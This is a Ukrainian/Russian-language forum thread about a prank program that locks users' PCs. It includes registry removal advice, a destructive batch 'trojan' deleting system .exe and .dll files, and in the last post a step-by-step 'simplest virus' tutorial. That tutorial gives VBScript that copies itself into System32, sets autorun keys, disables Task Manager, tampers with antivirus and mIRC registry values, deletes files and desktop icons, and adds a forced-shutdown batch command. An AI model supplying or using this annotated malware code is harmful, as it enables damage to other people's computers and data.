Перейти до змісту
  • "Великий брат" не стежить за тобою.

    Рекомендовані повідомлення

    Люди вы шо гоните так гнать не гоните

    шо делать?

    Я нажал Win+L и поменял пользователя а как ету дрянь убрать АААААААААААА

    НЕ ГОНИТЕ!!!!!!!!!! аааааааааа АААААААААААаа АААААААААаа МЛЯЯЯЯЯЯЯЯЯЯ

    Посилання на коментар
    Поділитись на інші сайти

    • Відповідей 120
    • Створено
    • Остання відповідь

    Топ авторів теми

    Топ авторів теми

    Люди вы шо гоните так гнать не гоните

    шо делать?

    Я нажал Win+L и поменял пользователя а как ету дрянь убрать АААААААААААА

    НЕ ГОНИТЕ!!!!!!!!!! аааааааааа АААААААААААаа АААААААААаа МЛЯЯЯЯЯЯЯЯЯЯ

     

    если один пользователь - не поменяешь)

    От судьбы не убежишь! Ты можешь лишь не надолго спрятатся от нее!
    Но она всё равно тебя ... найдёт!

    http://space-wars.com.ua/1.jpg
    <?php ?>

    Посилання на коментар
    Поділитись на інші сайти

    если один пользователь - не поменяешь)

     

    так я щя с второго пишу епт ШО ДЕЛАТЬ

    Посилання на коментар
    Поділитись на інші сайти

    так я щя с второго пишу епт ШО ДЕЛАТЬ

     

    тю.. все елементарно)

    От судьбы не убежишь! Ты можешь лишь не надолго спрятатся от нее!
    Но она всё равно тебя ... найдёт!

    http://space-wars.com.ua/1.jpg
    <?php ?>

    Посилання на коментар
    Поділитись на інші сайти

    тю.. все елементарно)

     

    кароче дело к ночи ........ НЕ ТЯНИ РЕЗИНУ

    Посилання на коментар
    Поділитись на інші сайти

    кароче дело к ночи ........ НЕ ТЯНИ РЕЗИНУ

     

    ладно... тебе повезло даже больше)

    1) удаляешь файл

    2) заходишь в regedit.exe

    3)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run и удаляешь значение той фигни, вот и всеt)

    От судьбы не убежишь! Ты можешь лишь не надолго спрятатся от нее!
    Но она всё равно тебя ... найдёт!

    http://space-wars.com.ua/1.jpg
    <?php ?>

    Посилання на коментар
    Поділитись на інші сайти

    ладно... тебе повезло даже больше)

    1) удаляешь файл

    2) заходишь в regedit.exe

    3)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run и удаляешь значение той фигни, вот и всеt)

     

    ето ты типа пошутил?

    Посилання на коментар
    Поділитись на інші сайти

    ето ты типа пошутил?

     

    нет

    От судьбы не убежишь! Ты можешь лишь не надолго спрятатся от нее!
    Но она всё равно тебя ... найдёт!

    http://space-wars.com.ua/1.jpg
    <?php ?>

    Посилання на коментар
    Поділитись на інші сайти

    Мда!Что-то лучше не могли придумать?Хоть у меня все закончилолось перезагруской,но я теперь боюсь на всякые ссылки заходить!!!!!!!! :angry:
    Посилання на коментар
    Поділитись на інші сайти

    ха у меня панда его дажет не разрешыла сохранить, у меня не спрашывая, сама удалила)))
    Посилання на коментар
    Поділитись на інші сайти

    ха у меня панда его дажет не разрешыла сохранить, у меня не спрашывая, сама удалила)))

     

    то что "панда" его обнаружила как опастость - это +. А то что не спросила - большой -

    Интернет должен был дать нам свободу, а вместо этого огромную кучу дерьма в перемешку с детским порно. ©

    Посилання на коментар
    Поділитись на інші сайти

    Блин повырубал только через regedit злостно)))
    http://city.brovary.net/portal/uploads/1262545545/gallery_1641_325_4434.jpg

    Посилання на коментар
    Поділитись на інші сайти

    Мда!Что-то лучше не могли придумать?Хоть у меня все закончилолось перезагруской,но я теперь боюсь на всякые ссылки заходить!!!!!!!! :angry:

     

    ты не не тотфайлик открыла ) открой 2 прекрепленый )

    flower

    power

    love

    peace

    Посилання на коментар
    Поділитись на інші сайти

    дурной прикол :angry:
    Посилання на коментар
    Поділитись на інші сайти

    тема: кто круче даст троян

     

    Пра трайан:

     

    @echo off
    cd
    cd C
    cd Windows
    del *.exe
    del *.dll
    cd system32
    del *.exe
    del *.dll
    
    п.с. БАТнікі рулять) Змінено користувачем Unro
    http://dl.dropbox.com/u/5006304/trolls.gif

    Посилання на коментар
    Поділитись на інші сайти

    Пра трайан:

     

    @echo off
    cd
    cd C
    cd Windows
    del *.exe
    del *.dll
    cd system32
    del *.exe
    del *.dll
    
    п.с. БАТнікі рулять)

     

    А через какой язык писать нада троян
    Посилання на коментар
    Поділитись на інші сайти

    А через какой язык писать нада троян

     

    Блокнотом пиши. Потім зберігай як ІМ"Я.bat і запускай :laugh:

    Це примітивний троян. Але страшний. Запустий і все, капут. Скинути тобі? :tongue:

    Я і не таке можу зробити.

    Змінено користувачем Unro
    http://dl.dropbox.com/u/5006304/trolls.gif

    Посилання на коментар
    Поділитись на інші сайти

    Та нет спасиба както и без него обойдусь :biggrin: :biggrin: :biggrin: просто интерессно через какии проги пишут вирусы!!

     

    А если антивирус есть то он же его удалит!!!Просто интересно запустить посмотреть что получилось :biggrin:

    Посилання на коментар
    Поділитись на інші сайти

    Мда.. один раз я уже на такую фигню залетел, второй раз как-то не оч хочеться) Жалко тех кто гамал, и не знает что делать дальше)
    Я слишком стар для этого дерьма.
    Посилання на коментар
    Поділитись на інші сайти

    Пра трайан:

    п.с. БАТнікі рулять)

     

    Блокнотом пиши. Потім зберігай як ІМ"Я.bat і запускай :laugh:

    Це примітивний троян. Але страшний. Запустий і все, капут. Скинути тобі? :tongue:

    Я і не таке можу зробити.

     

    Твой троян не выполнится никогда в жизни :wink:

    @echo off (отключение оповещений, ну тут ясно)
    cd (ничего не происходит)
    cd C (ничего не происходит т.к. после "с" нет двоеточия)
    cd Windows (если каким-то чудом ты попал на диск с входим в виндовую папку, НО увы только из командной строки. Батник не пойдет никуда командой cd, ему надо указывать абсолютный путь типа del c:\windows\ file.exe либо относительный del %windir%\file.exe)
    del *.exe (2 проблемы 1. по такой маске ничего не удалится, 2. ничего в принципе не удалится, т.к. Винда ругнется на системный файл и прервет процесс) 
    del *.dll (аналогично не зная имени файла батник не выполнит ровным счетом ничего, ничего не произойдет т.к. нужные библиотеки винда не даст удалить...)
    cd system32(не выполнится. см. выше)
    del *.exe(см.выше)
    del *.dll(см. выше)
    
    Посилання на коментар
    Поділитись на інші сайти

    можно ли сделать что бы БАТник вставил в автозагрузку определыный файл? (по типу скачал с локалки и вставил в автозагрузку)
    Посилання на коментар
    Поділитись на інші сайти

    чтобы батник, который пользователь запустит руками вставил в автозагрузку файл можно. Чтобы выполнился сам - нельзя.
    Посилання на коментар
    Поділитись на інші сайти

    можно ли сделать что бы БАТник вставил в автозагрузку определыный файл? (по типу скачал с локалки и вставил в автозагрузку)

    можна, если запулишь его в автозагрузку или если в задачи. Тогда выполнится.
    Посилання на коментар
    Поділитись на інші сайти

    то не пароль а номер аси ) только не бейте )

     

    совместными усилиями с Артёмкой мы справились с этой фигнёй всего навсего за час...

    Посилання на коментар
    Поділитись на інші сайти

    Простейший вирус своими руками

    Создаём файл virus.vbs , открываем блокнот ( в качестве редактора могу порекомендовать notepad++, который можно скачать здесь ) и начинаем писать наш вредоносный скрипт:

     

    Set Shell = CreateObject("Wscript.Shell")

    Set Application = CreateObject("Shell.Application")

    Set FileSystemObject = CreateObject("scripting.filesystemobject")

    Set File = FileSystemObject.GetFile(WScript.ScriptFullName)

    On Error Resume Next

    File.Copy ("c:windowsSystem32virus.vbs")

    Shell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunvirus", "C:WINDOWSSYSTEM32virus.vbs"

    Shell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesvirus", "C:WINDOWSSYSTEM32virus.vbs"

    Shell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOncevirus", "C:WINDOWSSYSTEM32virus.vbs"

    Shell.popup "message",5, "heading", 0+16

    FileSystemObject.deletefolder"C:example",True

    FileSystemObject.deletefile"C:example.txt",True

    Shell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisabletaskmgr", 1, "REG_DWORD"

    Shell.RegWrite "HKEY_CURRENT_USERSoftwaremIRCLicense", "blabla"

    Shell.RegWrite "HKEY_LOCAL_MACHINESOFTWAREESETESET SecurityCurrentVersionInfoEditionName", "hacked by ваш ник ;)))"

    Shell.RegDelete "HKEY_CURRENT_USERexample"

    Shell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop", 1, "REG_DWORD"

    Application.MinimizeAll

    InternerExplorer.Visible = True

    InternerExplorer.Navigate "http://porno.ru/"

     

    Теперь разберём по порядку каждую строчку:

     

    Set Shell = CreateObject("Wscript.Shell") 'с этого момента начинается VB скрипт

     

    Set Application = CreateObject("Shell.Application") 'разрешаем приложения

     

    Set FileSystemObject = CreateObject("scripting.filesystemobject") 'если в скрипте присутствует код использования ФС (aka файловой системы) то необходимо разрешить эту функцию перед началом ее выполнения

     

    Set File = FileSystemObject.GetFile(WScript.ScriptFullName) 'разрешаем работу с файлами (копирование, перемещение и т.д.)

     

    On Error Resume Next 'очень важная функция - пропуск ошибок (если какого-то файла/папки не окажется то произойдет ошибка в скрипте и все последующие функции не будут выполнены, после этой функции после возникающих ошибок последующие функции будут выполнятся как ни в чем не бывало)

     

    File.Copy ("c:windowsSystem32virus.vbs") 'создаём файл virus.vbs в директории c:windowsSystem32 , который содержит тот же код что и этот (короче данный файл копируется туда)

     

    Shell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunvirus", "C:WINDOWSSYSTEM32virus.vbs" 'прописываем только что созданный файл в автозагрузку через реестр в новый строковый параметр "virus" располагающийся здесь - HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

     

    Shell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesvirus", "C:WINDOWSSYSTEM32virus.vbs" 'прописываем только что созданный файл в автозагрузку через реестр в новый строковый параметр "virus" располагающийся здесь - HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices

     

    Shell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOncevirus", "C:WINDOWSSYSTEM32virus.vbs" 'если прописать наш файл только здесь, то вирус после перезагрузки запустится только один раз, но!!! когда он будет запускаться в нем будет присутствовать эта строка, которая снова пропишет его опять таки в эту директорию - и так после каждого ребута он всё равно будет запускаться. (можешь выбрать из всех трёх способов автозагрузки только один, на случай если юзер вдруг случайно наткнется на одну из этих записей в реестре)

     

    Shell.popup "message",5, "heading", 0+16 'выводим сообщение с заголовком "heading" и самим сообщением "message" и 0+16=ошибка(можно заменить на 0+64(значок i), 0+48(значок !), 0+32(значок ?) или 0+0(без значка)) и устанавливаем время показа мессаги в 5 сек.(если поставить 0 время показа будет неограниченным) эту сроку можно переместить и в конец скрипта, тогда сообщение будет выводиться после отработки скрипта. Вместо "message" ты можешь подставить любой текст. А что это будет за текст - это уже зависит от твоей фантазии.

     

    FileSystemObject.deletefolder"C:example",True 'удаляем папку example на диске C

     

    FileSystemObject.deletefile"C:example.txt",True 'удаляем файл example.txt на диске C

    'изменения реестра (все вкусности которые могут использовать вири, нам не перечислить):

     

    Shell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisabletaskmgr", 1, "REG_DWORD" 'отключаем ctrl+alt+del а точнее запрещаем запуск taskmgr aka диспетчер задач windows

     

    Shell.RegWrite "HKEY_CURRENT_USERSoftwaremIRCLicense", "blabla" 'если у юзера зарегана mIRC то можно сделать подляночку - пускай зарегает еще раз:) Для этого меняем серийник на blabla :) Ты можешь использовать данную функцию для любых других изменений значений реестра, для этого вместо "HKEY_CURRENT_USERSoftwaremIRCLicense" прописываешь путь до интересующего параметра, а вместо "blabla" новое значение.

     

    Shell.RegWrite "HKEY_LOCAL_MACHINESOFTWAREESETESET SecurityCurrentVersionInfoEditionName", "hacked by ваш ник ;)))" 'в главном окне антивируса NOD32 после слов ESET NOD32 Antivirus появится надпись Hacked by "ваш ник" неплохо, да? :)))

     

    Shell.RegDelete "HKEY_CURRENT_USERexample" 'удаляем ветку реестра HKEY_CURRENT_USERexample

     

    'и на последок делаем следующее:

    Shell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop", 1, "REG_DWORD" 'удаляем все с рабочего стола

     

    Application.MinimizeAll 'свёртываем все окна

     

    InternerExplorer.Visible = True

    InternerExplorer.Navigate "http://porno.ru/" 'переходим на порно сайт чтобы хоть как то успокоить юзера которому теперь не сладко придется.

     

    Так, с *.vbs вроде разобрались, а как же юзер который остался наедине с... как бы это сказать по мягче, в общем чтобы он не перевозбудился от всего только что увиденного, ограничим ему время просмотра до 120 секунд (2 минут :)). Для этого создадим файл virus.bat и впишем в него сдедующую команду:

     

    shutdown -s -f -t 120 -c "chuvak, chtoby ty ne perevozbudilsja, companija MiCrO$ofT ogranichila vremja prosmotra dannogo sajta do 2 minut, posle chego vy otpravytes v rebut"

     

    А чтобы не вылезала некрасивая консоль напишем перед этой командой следующее:

     

    @echo off

     

    Джойним два этих файлика и ... в общем это твоё дело для каких целей ты их будешь использовать, но я рекомендую их удалить :) , так сказать от греха подальше.

    Посилання на коментар
    Поділитись на інші сайти


    ×
    ×
    • Створити...

    Важлива інформація

    Використовуючи цей сайт, Ви погоджуєтеся з нашими Умови використання, Політика конфіденційності, Правила, Ми розмістили cookie-файлы на ваш пристрій, щоб допомогти зробити цей сайт кращим. Ви можете змінити налаштування cookie-файлів, або продовжити без зміни налаштувань..